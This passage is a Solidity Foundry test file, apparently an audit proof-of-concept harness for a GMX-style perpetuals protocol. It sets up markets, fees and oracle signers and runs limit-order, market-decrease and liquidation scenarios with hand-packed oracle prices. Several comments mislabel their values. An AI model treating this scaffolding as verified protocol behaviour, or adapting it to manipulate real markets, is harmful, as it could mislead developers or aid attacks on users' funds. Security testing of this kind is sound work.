Role.CONTROLLER); // so it can call EventEmitter\\n _roleStore.grantRole(address(_oracle), Role.CONTROLLER); // so it can call EventEmitter\\n _roleStore.grantRole(address(this), Role.ORDER_KEEPER);\\n _roleStore.grantRole(address(this), Role.LIQUIDATION_KEEPER);\\n\\n \\n _marketProps1 = _marketFactory.createMarket(address(_sol), address(_wnt), address(_usdc), keccak256(abi.encode(""sol-wnt-usdc""))); \\n _marketPropsAB = _marketFactory.createMarket(address(0), address(_tokenA), address(_tokenB), keccak256(abi.encode(""swap-tokenA-tokenB""))); \\n _marketPropsBC = _marketFactory.createMarket(address(0), address(_tokenB), address(_tokenC), keccak256(abi.encode(""swap-tokenB-tokenC""))); \\n _marketPropsCwnt = _marketFactory.createMarket(address(0), address(_tokenC), address(_wnt), keccak256(abi.encode(""swap-tokenC-wnt""))); \\n \\n \\n _dataStore.setUint(Keys.minCollateralFactorForOpenInterestMultiplierKey(_marketProps1.marketToken, true), 1e25);\\n _dataStore.setUint(Keys.minCollateralFactorForOpenInterestMultiplierKey(_marketProps1.marketToken, false), 1e25);\\n \\n // see fees for the market\\n _dataStore.setUint(Keys.swapFeeFactorKey(_marketProps1.marketToken), 0.05e30); // 5%\\n _dataStore.setUint(Keys.SWAP_FEE_RECEIVER_FACTOR, 0.5e30);\\n _dataStore.setUint(Keys.positionFeeFactorKey(_marketProps1.marketToken), 0.00001234e30); // 2%\\n _dataStore.setUint(Keys.POSITION_FEE_RECEIVER_FACTOR, 0.15e30);\\n _dataStore.setUint(Keys.MAX_UI_FEE_FACTOR, 0.01e30);\\n _dataStore.setUint(Keys.uiFeeFactorKey(uiFeeReceiver), 0.01e30); // only when this is set, one can receive ui fee, so stealing is not easy\\n _dataStore.setInt(Keys.poolAmountAdjustmentKey(_marketProps1.marketToken, _marketProps1.longToken), 1);\\n _dataStore.setInt(Keys.poolAmountAdjustmentKey(_marketProps1.marketToken, _marketProps1.shortToken), 1);\\n _dataStore.setUint(Keys.swapImpactExponentFactorKey(_marketProps1.marketToken), 10e28);\\n 
_dataStore.setUint(Keys.swapImpactFactorKey(_marketProps1.marketToken, true), 0.99e30);\\n _dataStore.setUint(Keys.swapImpactFactorKey(_marketProps1.marketToken, false), 0.99e30);\\n\\n \\n \\n \\n // set gas limit to transfer a token\\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_sol)), 32000); \\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_wnt)), 32000); \\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_usdc)), 32000); \\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_tokenA)), 32000); \\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_tokenB)), 32000); \\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_tokenC)), 32000); \\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_marketProps1.marketToken)), 32000); \\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_marketPropsAB.marketToken)), 32000);\\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_marketPropsBC.marketToken)), 32000);\\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_marketPropsCwnt.marketToken)), 32000);\\n\\n\\n /* Configure the system parameters/limits here */\\n _dataStore.setUint(Keys.MAX_CALLBACK_GAS_LIMIT, 10000);\\n _dataStore.setUint(Keys.EXECUTION_GAS_FEE_BASE_AMOUNT, 100);\\n _dataStore.setUint(Keys.MAX_ORACLE_PRICE_AGE, 2 hours);\\n _dataStore.setUint(Keys.MIN_ORACLE_BLOCK_CONFIRMATIONS, 3);\\n _dataStore.setUint(Keys.MIN_COLLATERAL_USD, 1e30); // just require $1 as min collateral usd\\n _dataStore.setUint(Keys.reserveFactorKey(_marketProps1.marketToken, true), 5e29); // 50%\\n _dataStore.setUint(Keys.reserveFactorKey(_marketProps1.marketToken, false), 5e29);\\n _dataStore.setUint(Keys.fundingExponentFactorKey(_marketProps1.marketToken), 1.1e30); // 2 in 30 decimals like a square, cube, etc\\n _dataStore.setUint(Keys.fundingFactorKey(_marketProps1.marketToken), 0.0000001e30);\\n _dataStore.setUint(Keys.borrowingFactorKey(_marketProps1.marketToken, true), 0.87e30);\\n 
_dataStore.setUint(Keys.borrowingFactorKey(_marketProps1.marketToken, false), 0.96e30);\\n _dataStore.setUint(Keys.borrowingExponentFactorKey(_marketProps1.marketToken, true), 2.1e30);\\n _dataStore.setUint(Keys.borrowingExponentFactorKey(_marketProps1.marketToken, false), 2.3e30);\\n _dataStore.setUint(Keys.positionImpactExponentFactorKey(_marketProps1.marketToken), 2e30);\\n _dataStore.setUint(Keys.positionImpactFactorKey(_marketProps1.marketToken, true), 5e22); \\n _dataStore.setUint(Keys.positionImpactFactorKey(_marketProps1.marketToken, false), 1e23);\\n\\n // set the limit of market tokens\\n\\n _dataStore.setUint(Keys.maxPoolAmountKey(_marketProps1.marketToken, _marketProps1.longToken), 1000e18);\\n _dataStore.setUint(Keys.maxPoolAmountKey(_marketProps1.marketToken, _marketProps1.shortToken), 1000e18);\\n _dataStore.setUint(Keys.maxPoolAmountKey(_marketPropsAB.marketToken, _marketPropsAB.longToken), 1000e18);\\n _dataStore.setUint(Keys.maxPoolAmountKey(_marketPropsAB.marketToken, _marketPropsAB.shortToken), 1000e18);\\n _dataStore.setUint(Keys.maxPoolAmountKey(_marketPropsBC.marketToken, _marketPropsBC.longToken), 1000e18);\\n _dataStore.setUint(Keys.maxPoolAmountKey(_marketPropsBC.marketToken, _marketPropsBC.shortToken), 1000e18);\\n _dataStore.setUint(Keys.maxPoolAmountKey(_marketPropsCwnt.marketToken, _marketPropsCwnt.longToken), 1000e18);\\n _dataStore.setUint(Keys.maxPoolAmountKey(_marketPropsCwnt.marketToken, _marketPropsCwnt.shortToken), 1000e18);\\n \\n \\n // set max open interest for each market\\n _dataStore.setUint(Keys.maxOpenInterestKey(_marketProps1.marketToken, true), 1e39); // 1B $ \\n _dataStore.setUint(Keys.maxOpenInterestKey(_marketProps1.marketToken, false), 1e39); // 1B $\\n\\n _dataStore.setUint(Keys.maxPnlFactorKey(Keys.MAX_PNL_FACTOR_FOR_WITHDRAWALS, _marketProps1.marketToken, true), 10**29); // maxPnlFactor = 10% for long\\n _dataStore.setUint(Keys.maxPnlFactorKey(Keys.MAX_PNL_FACTOR_FOR_WITHDRAWALS, _marketProps1.marketToken, 
false), 10**29); // maxPnlFactor = 10% for short\\n // _dataStore.setBool(Keys.cancelDepositFeatureDisabledKey(address(_depositHandler)), true);\\n _dataStore.setBool(Keys.cancelOrderFeatureDisabledKey(address(_orderHandler), uint256(Order.OrderType.MarketIncrease)), true);\\n\\n addFourSigners();\\n address(_wnt).call{value: 10000e18}("""");\\n depositor1 = address(0x801);\\n depositor2 = address(0x802);\\n depositor3 = address(0x803);\\n\\n // make sure each depositor has some tokens.\\n _wnt.transfer(depositor1, 1000e18);\\n _wnt.transfer(depositor2, 1000e18);\\n _wnt.transfer(depositor3, 1000e18); \\n _usdc.transfer(depositor1, 1000e18);\\n _usdc.transfer(depositor2, 1000e18);\\n _usdc.transfer(depositor3, 1000e18);\\n _tokenA.transfer(depositor1, 1000e18);\\n _tokenB.transfer(depositor1, 1000e18);\\n _tokenC.transfer(depositor1, 1000e18); \\n\\n printAllTokens(); \\n }\\n\\n error Unauthorized(string);\\n // error Error(string);\\n\\n\\nfunction testLimit() public{\\n OracleUtils.SetPricesParams memory priceParams = createSetPricesParams();\\n \\n vm.roll(block.number+2); // block 3\\n\\n \\n bytes32 key = createDepositNoSwap(_marketProps1, depositor1, 90e18, true); // create a deposit at block 3 which is within range (2, 6) \\n _depositHandler.executeDeposit(key, priceParams); \\n uint mintedMarketTokens = IERC20(_marketProps1.marketToken).balanceOf(depositor1);\\n key = createDepositNoSwap(_marketProps1, depositor1, 100e18, false); // create a deposit at block 3 which is within range (2, 6) \\n _depositHandler.executeDeposit(key, priceParams); \\n mintedMarketTokens = IERC20(_marketProps1.marketToken).balanceOf(depositor1);\\n console2.log(""Experiment 1 is completed.""); \\n \\n // console2.log(""PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP"");\\n \\n key = createMarketSwapOrder(depositor1, address(_wnt), 1e15); // create a deposit at block 3 which is within range (2, 6) \\n _orderHandler.executeOrder(key, priceParams); \\n console2.log(""Experiment 
2 is completed.""); \\n \\n\\n console2.log(""\\n\\n depositor 1 createMarketIncreaseOrder"");\\n key = createMarketIncreaseOrder(depositor1, _marketProps1.marketToken, _marketProps1.longToken, 20e18, 1001e30, 106000000000000, true); // \\n console2.log(""\\nExecuting the order// rest of code"");\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor1, _marketProps1.marketToken, _marketProps1.longToken, true);\\n console2.log(""Experiment 3 is completed.""); \\n \\n \\n\\n console2.log(""\\n\\n depositor 2 createMarketIncreaseOrder"");\\n key = createMarketIncreaseOrder(depositor2, _marketProps1.marketToken, _marketProps1.longToken, 110e18, 13e30, 101000000000000, false); // 110 usdc as collateral\\n console2.log(""\\nExecuting the order// rest of code"");\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor2, _marketProps1.marketToken, _marketProps1.longToken, false);\\n console2.log(""Experiment 4 is completed.""); \\n \\n\\n\\n console2.log(""PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP"");\\n vm.warp(2 days);\\n setIndexTokenPrice(priceParams, 98, 100); // send 20e18 USDC, increase $13.123 in a long position with trigger price 101\\n key = createLimitIncreaseOrder(depositor3, _marketProps1.marketToken, _marketProps1.shortToken, 23e18, 1.1234567e30, 101000000000000, true); // collateral token, usdsize, price\\n console2.log(""a LimitIncrease order created by depositor3 with key: "");\\n console2.logBytes32(key);\\n Position.printPosition(_dataStore, depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true);\\n console2.log(""\\n\\nExecuting the order, exiting moment// rest of code\\n\\n"");\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true);\\n console2.log(""Experiment 5 is completed.\\n""); \\n \\n\\n // depositor3 creates a LimitDecrease order\\n 
/*\\n setIndexTokenPrice(priceParams, 120, 125);\\n key = createLimitDecreaseOrder(depositor3, _marketProps1.marketToken, _marketProps1.shortToken, 7e18, 58e30, 120000000000000, 120000000000000, true); // retrieve $50? collateral token, usdsize, acceptible price\\n console2.log(""a LimitIncrease order created by depositor3 with key: "");\\n console2.logBytes32(key);\\n Position.printPosition(_dataStore, depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true);\\n console2.log(""\\n\\nExecuting the order, exiting moment// rest of code\\n\\n"");\\n _orderHandler.executeOrder(key, priceParams); \\n console2.log(""Experiment 7 for is completed.""); \\n */\\n}\\n\\nfunction testMarketDecrease() public{\\n \\n OracleUtils.SetPricesParams memory priceParams = createSetPricesParams();\\n \\n vm.roll(block.number+2); // block 3\\n\\n \\n bytes32 key = createDepositNoSwap(_marketProps1, depositor1, 90e18, true); // create a deposit at block 3 which is within range (2, 6) \\n _depositHandler.executeDeposit(key, priceParams); \\n uint mintedMarketTokens = IERC20(_marketProps1.marketToken).balanceOf(depositor1);\\n key = createDepositNoSwap(_marketProps1, depositor1, 100e18, false); // create a deposit at block 3 which is within range (2, 6) \\n _depositHandler.executeDeposit(key, priceParams); \\n mintedMarketTokens = IERC20(_marketProps1.marketToken).balanceOf(depositor1);\\n console2.log(""Experiment 1 is completed.""); \\n \\n \\n \\n \\n console2.log(""\\n\\n depositor 2 deposit into marketProps1"");\\n key = createDepositNoSwap(_marketProps1, depositor2, 100e18, true);\\n _depositHandler.executeDeposit(key, priceParams);\\n mintedMarketTokens = IERC20(_marketProps1.marketToken).balanceOf(depositor2);\\n printPoolsAmounts();\\n console2.log(""Experiment 2 is completed.""); \\n \\n \\n console2.log(""\\n\\n depositor 1 createMarketIncreaseOrder"");\\n key = createMarketIncreaseOrder(depositor1, _marketProps1.marketToken, _marketProps1.longToken, 20e18, 1e25, 
106000000000000, true); // \\n console2.log(""\\nExecuting the order// rest of code"");\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor1, _marketProps1.marketToken, _marketProps1.longToken, true);\\n console2.log(""Experiment 3 is completed.""); \\n \\n \\n\\n console2.log(""\\n\\n depositor 2 createMarketIncreaseOrder"");\\n key = createMarketIncreaseOrder(depositor2, _marketProps1.marketToken, _marketProps1.longToken, 110e18, 1e25, 101000000000000, false); // 110 usdc as collateral\\n console2.log(""\\nExecuting the order// rest of code"");\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor2, _marketProps1.marketToken, _marketProps1.longToken, false);\\n console2.log(""Experiment 4 is completed.""); \\n \\n console2.log(""********************************************"");\\n\\n // deposit 2 will execute a marketDecreaseOrder now\\n key = createMarketDecreaseOrder(depositor2, _marketProps1.marketToken, _marketProps1.longToken, 70000000000000, 5e23, false) ; // decrease by 5%\\n console2.log(""a market desced order created with key: "");\\n console2.logBytes32(key);\\n console2.log(""\\nExecuting the order// rest of code""); \\n setIndexTokenPrice(priceParams, 60, 65); // we have a profit for a short position\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor2, _marketProps1.marketToken, _marketProps1.longToken, false);\\n console2.log(""Experiment 5 is completed.""); \\n\\n printAllTokens();\\n} \\n\\n \\n\\nfunction testLiquidation() public{\\n // blockrange (2, 6)\\n OracleUtils.SetPricesParams memory priceParams = createSetPricesParams();\\n \\n vm.roll(block.number+2); // block 3\\n\\n \\n bytes32 key = createDepositNoSwap(_marketProps1, depositor1, 90e18, true); // create a deposit at block 3 which is within range (2, 6) \\n _depositHandler.executeDeposit(key, priceParams); \\n uint mintedMarketTokens = 
IERC20(_marketProps1.marketToken).balanceOf(depositor1);\\n key = createDepositNoSwap(_marketProps1, depositor1, 100e18, false); // create a deposit at block 3 which is within range (2, 6) \\n _depositHandler.executeDeposit(key, priceParams); \\n mintedMarketTokens = IERC20(_marketProps1.marketToken).balanceOf(depositor1);\\n console2.log(""Experiment 1 is completed.""); \\n \\n \\n \\n \\n console2.log(""\\n\\n depositor 2 deposit into marketProps1"");\\n key = createDepositNoSwap(_marketProps1, depositor2, 100e18, true);\\n _depositHandler.executeDeposit(key, priceParams);\\n mintedMarketTokens = IERC20(_marketProps1.marketToken).balanceOf(depositor2);\\n printPoolsAmounts();\\n console2.log(""Experiment 2 is completed.""); \\n \\n \\n console2.log(""\\n\\n depositor 1 createMarketIncreaseOrder"");\\n key = createMarketIncreaseOrder(depositor1, _marketProps1.marketToken, _marketProps1.longToken, 10e18, 1e25, 106000000000000, true);\\n console2.log(""\\nExecuting the order// rest of code"");\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor1, _marketProps1.marketToken, _marketProps1.longToken, true);\\n console2.log(""Experiment 3 is completed.""); \\n \\n \\n\\n console2.log(""\\n\\n depositor 2 createMarketIncreaseOrder"");\\n key = createMarketIncreaseOrder(depositor2, _marketProps1.marketToken, _marketProps1.shortToken, 100e18, 1e25, 101000000000000, false);\\n console2.log(""\\nExecuting the order// rest of code"");\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor2, _marketProps1.marketToken, _marketProps1.shortToken, false);\\n console2.log(""Experiment 4 is completed.""); \\n \\n \\n\\n // deposit 2 will execute a marketDecreaseOrder now\\n key = createMarketDecreaseOrder(depositor2, _marketProps1.marketToken, _marketProps1.shortToken, 106000000000000, 5e23, false) ; // decrease by 5%\\n console2.log(""a market desced order created with key: "");\\n 
console2.logBytes32(key);\\n console2.log(""\\nExecuting the order// rest of code""); \\n setIndexTokenPrice(priceParams, 84, 90);\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor2, _marketProps1.marketToken, _marketProps1.shortToken, false);\\n console2.log(""Experiment 5 is completed.""); \\n \\n \\n\\n \\n // depositor3 will execute a LimitIncrease Order now\\n key = createMarketIncreaseOrder(depositor3, _marketProps1.marketToken, _marketProps1.shortToken, 20e18, 200e30, 101000000000000, true); // collateral token, usdsize, price\\n console2.log(""a LimitIncrease order created by depositor3 with key: "");\\n console2.logBytes32(key);\\n Position.printPosition(_dataStore, depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true);\\n console2.log(""\\n\\nExecuting the order, exiting moment// rest of code\\n\\n"");\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true);\\n console2.log(""Experiment 6 is completed.\\n""); \\n \\n\\n // depositor3 creates a LimitDecrease order\\n setIndexTokenPrice(priceParams, 120, 125);\\n key = createLimitDecreaseOrder(depositor3, _marketProps1.marketToken, _marketProps1.shortToken, 7e18, 58e30, 120000000000000, 120000000000000, true); // retrieve $50? 
collateral token, usdsize, acceptible price\\n console2.log(""a LimitIncrease order created by depositor3 with key: "");\\n console2.logBytes32(key);\\n Position.printPosition(_dataStore, depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true);\\n console2.log(""\\n\\nExecuting the order, exiting moment// rest of code\\n\\n"");\\n _orderHandler.executeOrder(key, priceParams); \\n console2.log(""Experiment 7 for is completed.""); \\n \\n // depositor3 creates a stopLossDecrease order\\n setIndexTokenPrice(priceParams, 97, 99);\\n key = createStopLossDecrease(depositor3, _marketProps1.marketToken, _marketProps1.shortToken, 7e18, 58e30, 95000000000000, 92000000000000, true); // retrieve $50? collateral token, usdsize, acceptible price\\n console2.log(""a StopLossDecrease order created by depositor3 with key: "");\\n console2.logBytes32(key);\\n // Position.printPosition(_dataStore, depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true);\\n\\n console2.log(""\\n\\nExecuting the order, exiting moment// rest of code\\n\\n"");\\n _orderHandler.executeOrder(key, priceParams);\\n console2.log(""Experiment 8 is completed.""); \\n \\n \\n console2.log(""\\n\\n*************************************************\\n\\n"");\\n\\n\\n // depositor3 creates a Liquidation order\\n setIndexTokenPrice(priceParams, 75, 75);\\n console2.log(""Liquidate a position// rest of code"");\\n Position.printPosition(_dataStore, depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true);\\n _liquidationHandler.executeLiquidation(depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true, priceParams);\\n console2.log(""Experiment 9 is completed.""); \\n \\n\\n // printPoolsAmounts();\\n printAllTokens();\\n\\n \\n \\n \\n}\\n\\nfunction printAllTokens() startedCompleted(""printAllTokens"") public\\n{\\n console2.log(""\\nTokens used in this test:"");\\n console2.log(""_wnt: ""); console2.logAddress(address(_wnt));\\n console2.log(""_usdc: ""); 
console2.logAddress(address(_usdc));\\n console2.log(""_sol: ""); console2.logAddress(address(_sol));\\n console2.log(""_tokenA: ""); console2.logAddress(address(_tokenA));\\n console2.log(""_tokenB: ""); console2.logAddress(address(_tokenB));\\n console2.log(""_tokenC: ""); console2.logAddress(address(_tokenC));\\n console2.logString(""test contract address:""); console2.logAddress(address(this));\\n \\n console2.log(""_marketProps1 market token: ""); console2.logAddress(address(_marketProps1.marketToken));\\n console2.log(""_marketPropsAB market token: ""); console2.logAddress(address(_marketPropsAB.marketToken));\\n console2.log(""_marketPropsBC market token: ""); console2.logAddress(address(_marketPropsBC.marketToken));\\n console2.log(""_marketProps1Cwnt market token: ""); console2.logAddress(address(_marketPropsCwnt.marketToken));\\n console2.log(""\\n"");\\n \\n \\n}\\n\\n\\nfunction printMarketTokenAmount() public \\n{ console2.log(""Market token address: "");\\n console2.logAddress(address(_marketProps1.marketToken));\\n console2.log(""depositor1 market token amount: %d"", IERC20(_marketProps1.marketToken).balanceOf(depositor1));\\n console2.log(""depositor2 market token amount: %d"", IERC20(_marketProps1.marketToken).balanceOf(depositor2));\\n console2.log(""depositor3 market token amount: %d"", IERC20(_marketProps1.marketToken).balanceOf(depositor3));\\n}\\n\\nfunction printLongShortTokens(address account) public\\n{\\n console2.log(""balance for ""); console2.logAddress(account);\\n console2.log(""_wnt balance:"", _wnt.balanceOf(account));\\n console2.log(""usdc balance:"", _usdc.balanceOf(account));\\n}\\n\\n\\n\\n\\nfunction addFourSigners() private {\\n _oracleStore.addSigner(address(901));\\n _oracleStore.addSigner(address(902)); \\n _oracleStore.addSigner(address(903)); \\n _oracleStore.addSigner(address(904)); \\n}\\n\\n\\nfunction setIndexTokenPrice(OracleUtils.SetPricesParams memory priceParams, uint256 minP, uint256 maxP) public\\n{\\n uint256 
mask1 = ~uint256(type(uint96).max); // (32*3 of 1's)\\n console2.logBytes32(bytes32(mask1));\\n\\n uint256 minPrice = minP;\\n minPrice = minPrice << 32 | minP;\\n minPrice = minPrice << 32 | minP;\\n\\n uint256 maxPrice = maxP;\\n maxPrice = maxPrice << 32 | maxP;\\n maxPrice = maxPrice << 32 | maxP;\\n\\n priceParams.compactedMinPrices[0] = (priceParams.compactedMinPrices[0] & mask1) | minPrice;\\n priceParams.compactedMaxPrices[0] = (priceParams.compactedMaxPrices[0] & mask1) | maxPrice;\\n}\\n\\n\\nfunction createSetPricesParams() public returns (OracleUtils.SetPricesParams memory) {\\n uint256 signerInfo = 3; // signer 904\\n signerInfo = signerInfo << 16 | 2; // signer 903\\n signerInfo = signerInfo << 16 | 1; // signer 902\\n signerInfo = signerInfo << 16 | 3; // number of singers\\n // will read out as 902, 903, 904 from the lowest first\\n\\n // the number of tokens, 6\\n address[] memory tokens = new address[](6);\\n tokens[0] = address(_sol);\\n tokens[1] = address(_wnt);\\n tokens[2] = address(_usdc);\\n tokens[3] = address(_tokenA);\\n tokens[4] = address(_tokenB);\\n tokens[5] = address(_tokenC);\\n\\n // must be equal to the number of tokens 6, 64 for each one, so 64*6. 64*4 for one element, so need two elements \\n uint256[] memory compactedMinOracleBlockNumbers = new uint256[](2);\\n compactedMinOracleBlockNumbers[0] = block.number+1;\\n compactedMinOracleBlockNumbers[0] = compactedMinOracleBlockNumbers[0] << 64 | block.number+1;\\n compactedMinOracleBlockNumbers[0] = compactedMinOracleBlockNumbers[0] << 64 | block.number+1;\\n compactedMinOracleBlockNumbers[0] = compactedMinOracleBlockNumbers[0] << 64 | block.number+1;\\n\\n compactedMinOracleBlockNumbers[1] = block.number+1;\\n compactedMinOracleBlockNumbers[1] = compactedMinOracleBlockNumbers[0] << 64 | block.number+1;\\n \\n // must be equal to the number of tokens 6, 64 for each one, so 64*6. 
64*4 for one element, so need two elements \\n \\n uint256[] memory compactedMaxOracleBlockNumbers = new uint256[](2);\\n compactedMaxOracleBlockNumbers[0] = block.number+5; \\n compactedMaxOracleBlockNumbers[0] = compactedMaxOracleBlockNumbers[0] << 64 | block.number+5;\\n compactedMaxOracleBlockNumbers[0] = compactedMaxOracleBlockNumbers[0] << 64 | block.number+5; \\n compactedMaxOracleBlockNumbers[0] = compactedMaxOracleBlockNumbers[0] << 64 | block.number+5; \\n\\n compactedMaxOracleBlockNumbers[1] = block.number+5; \\n compactedMaxOracleBlockNumbers[1] = compactedMaxOracleBlockNumbers[0] << 64 | block.number+5;\\n\\n // must be equal to the number of tokens 6, 64 for each one, so 64*6. 64*4 for one element, so need two elements \\n uint256[] memory compactedOracleTimestamps = new uint256[](2);\\n compactedOracleTimestamps[0] = 9;\\n compactedOracleTimestamps[0] = compactedOracleTimestamps[0] << 64 | 8;\\n compactedOracleTimestamps[0] = compactedOracleTimestamps[0] << 64 | 7;\\n compactedOracleTimestamps[0] = compactedOracleTimestamps[0] << 64 | 7;\\n \\n compactedOracleTimestamps[1] = 9;\\n compactedOracleTimestamps[1] = compactedOracleTimestamps[0] << 64 | 8;\\n \\n\\n // must be equal to the number of tokens, 8 for each, so 8*6= 48, only need one element\\n uint256[] memory compactedDecimals = new uint256[](1);\\n compactedDecimals[0] = 12;\\n compactedDecimals[0] = compactedDecimals[0] << 8 | 12;\\n compactedDecimals[0] = compactedDecimals[0] << 8 | 12;\\n compactedDecimals[0] = compactedDecimals[0] << 8 | 12;\\n compactedDecimals[0] = compactedDecimals[0] << 8 | 12;\\n compactedDecimals[0] = compactedDecimals[0] << 8 | 12;\\n \\n \\n // three signers, 6 tokens, so we have 3*6 = 18 entries, each entry takes 32 bits, so each 8 entries takes one element, we need 3 elements\\n // price table:\\n // SOL: 100 101 102\\n // wnt: 200 201 203\\n // USDC 1 1 1\\n // tokenA 100 101 102\\n // tokenB 200 202 204\\n // tokenC 400 404 408\\n\\n uint256[] memory 
compactedMinPrices = new uint256[](3);\\n compactedMinPrices[2] = 408; \\n compactedMinPrices[2] = compactedMinPrices[2] << 32 | 404;\\n\\n compactedMinPrices[1] = 400;\\n compactedMinPrices[1] = compactedMinPrices[1] << 32 | 204;\\n compactedMinPrices[1] = compactedMinPrices[1] << 32 | 202;\\n compactedMinPrices[1] = compactedMinPrices[1] << 32 | 200;\\n compactedMinPrices[1] = compactedMinPrices[1] << 32 | 102;\\n compactedMinPrices[1] = compactedMinPrices[1] << 32 | 101;\\n compactedMinPrices[1] = compactedMinPrices[1] << 32 | 100;\\n compactedMinPrices[1] = compactedMinPrices[1] << 32 | 1;\\n \\n compactedMinPrices[0] = 1;\\n compactedMinPrices[0] = compactedMinPrices[0] << 32 | 1;\\n compactedMinPrices[0] = compactedMinPrices[0] << 32 | 203;\\n compactedMinPrices[0] = compactedMinPrices[0] << 32 | 201;\\n compactedMinPrices[0] = compactedMinPrices[0] << 32 | 200;\\n compactedMinPrices[0] = compactedMinPrices[0] << 32 | 102;\\n compactedMinPrices[0] = compactedMinPrices[0] << 32 | 101;\\n compactedMinPrices[0] = compactedMinPrices[0] << 32 | 100;\\n \\n // three signers, 6 tokens, so we have 3*6 = 18 entries, each entry takes 8 bits, so we just need one element\\n\\n uint256[] memory compactedMinPricesIndexes = new uint256[](1);\\n compactedMinPricesIndexes[0] = 1;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 2;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 0;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 1;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 2;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 0;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 1;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 2;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 0; \\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 1;\\n compactedMinPricesIndexes[0] = 
compactedMinPricesIndexes[0] << 8 | 2;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 0; \\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 1;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 2;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 0; \\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 1;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 2;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 0; \\n \\n // three signers, 6 tokens, so we have 3*6 = 18 entries, each entry takes 32 bits, so each 8 entries takes one element, we need 3 elements\\n // price table:\\n // SOL: 105 106 107\\n // wnt: 205 206 208\\n // USDC 1 1 1\\n // tokenA 105 106 107\\n // tokenB 205 207 209\\n // tokenC 405 409 413\\n uint256[] memory compactedMaxPrices = new uint256[](3);\\n compactedMaxPrices[2] = 413;\\n compactedMaxPrices[2] = compactedMaxPrices[2] << 32 | 409;\\n \\n compactedMaxPrices[1] = 405;\\n compactedMaxPrices[1] = compactedMaxPrices[1] << 32 | 209;\\n compactedMaxPrices[1] = compactedMaxPrices[1] << 32 | 207;\\n compactedMaxPrices[1] = compactedMaxPrices[1] << 32 | 205;\\n compactedMaxPrices[1] = compactedMaxPrices[1] << 32 | 107;\\n compactedMaxPrices[1] = compactedMaxPrices[1] << 32 | 106;\\n compactedMaxPrices[1] = compactedMaxPrices[1] << 32 | 105;\\n compactedMaxPrices[1] = compactedMaxPrices[1] << 32 | 1;\\n\\n compactedMaxPrices[0] = 1;\\n compactedMaxPrices[0] = compactedMaxPrices[0] << 32 | 1;\\n compactedMaxPrices[0] = compactedMaxPrices[0] << 32 | 208;\\n compactedMaxPrices[0] = compactedMaxPrices[0] << 32 | 206; \\n compactedMaxPrices[0] = compactedMaxPrices[0] << 32 | 205; \\n compactedMaxPrices[0] = compactedMaxPrices[0] << 32 | 107;\\n compactedMaxPrices[0] = compactedMaxPrices[0] << 32 | 106;\\n compactedMaxPrices[0] = compactedMaxPrices[0] << 32 | 105;\\n \\n \\n // three signers, 6 tokens, so we have 3*6 = 
